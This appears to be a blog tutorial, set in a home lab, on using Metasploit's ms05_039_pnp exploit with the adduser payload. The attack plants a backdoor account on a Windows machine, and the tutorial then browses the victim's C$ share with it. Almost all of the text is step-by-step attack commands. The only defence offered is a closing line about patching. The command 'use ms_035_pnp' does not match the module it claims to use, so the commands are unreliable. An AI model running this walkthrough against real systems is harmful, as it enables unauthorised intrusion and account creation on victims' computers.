It is a great tool and it can be downloaded from:
http://www.metasploit.com/
The best thing is it is available for everyone for free.
It is very easy to use and I am going to show you now.
Scenario:
** I am demonstrating this in my security lab
** The attacker computer will be 192.168.1.9 (Linux Backtrack 4)
** The slave computer will be 192.168.1.10
First of all,open up Metaploit
This is the interface of Metasploit and it is ready for you to insert the command.
The first command that will be entered to the shell is
** show exploits
Basically,this command will show all the exploits that can be used by the attacker.
Press ENTER and all the exploits will be shown to the attacker.
Now,the attacker is going to choose the exploit.
In this case,the attacker will use ms05_039_pnp exploit.
The command to use the exploit is
** use ms_035_pnp
Press ENTER and the exploit will be used.
Now,we are going to see what the exploit can do for the attacker.
The attacker will now issues this command
** show payloads
Press on ENTER and all the payloads will be shown to the attacker.
In this case,the attacker is going to add an user to the slave computer.
The command that will be issues is
** set payload windows/adduser
Press on ENTER and that payload will be used.
The next thing that the attacker needs to do is set the target.
The attacker now needs to issues this command to see the target list
** show targets
After the attacker has determine the target,the next thing is to set the target.
The command that can be used is
** set target 0
The number will be according to the slave operating system.
The next steps will be show the fields that need to fill up by the attacker.
The command will be
** show options
There will be empty fields that need to be filled by the attacker.
In this case,the empty fields are RHOST and PASS.
RHOST stands for Remote Host (slave IP address).
PASS stands for Password.
To set both of them,the commands are
** set RHOST 192.168.1.10
** set PASS 12345
The attacker is setting remote host.
The attacker is setting Password.
Finally,the last command that need to be used is
** exploit
The exploit command will call Metasploit to launch the attack to the slave.
Press ENTER and Metasploit will launch the attack.
Now the attacker know that he has an account at the slave machine.
Account information:
username = Metasploit
password = 12345
Now it is the time for the attacker to enter the slave machine.
The attacker will open up a RUN box.
In the RUN box,the attacker will type in
** \\192.168.1.10\c$
Press ENTER and a login prompt will pop up.
Atacker needs to enter the username and password for the slave machine.
In this case,the username and password are Metasploit and 12345.
Press ENTER and the attacker is in the slave machine.
The above picture shows that the attacker is in the C drive of slave machine.
What can a slave see on his machine?
If the slave launch a Command Prompt and type in
** net user
The result will be
Do you see that?
The username "metasploit" is there.
That is the username that the attacker created.
The commands that I used:
** show exploits
** use EXPLOITNAME
** show payloads
** set payload PAYLOADNAME
** show targets
** set target TARGETNUMBER
** show options
** set RHOST IPADDRESS
** exploit
Imagine that you are in the Cafe drinking coffee and using laptop.
The attacker is around you and attacks your computer.
The attacker can does anything he wants when he is in the C drive.
The solution will be patching your operating system with the latest security hot-fix from the vendor.
I will end my tutorial here.
Hope you will like it and feel free to comment.
Click To View :
Labels: Tips Internet
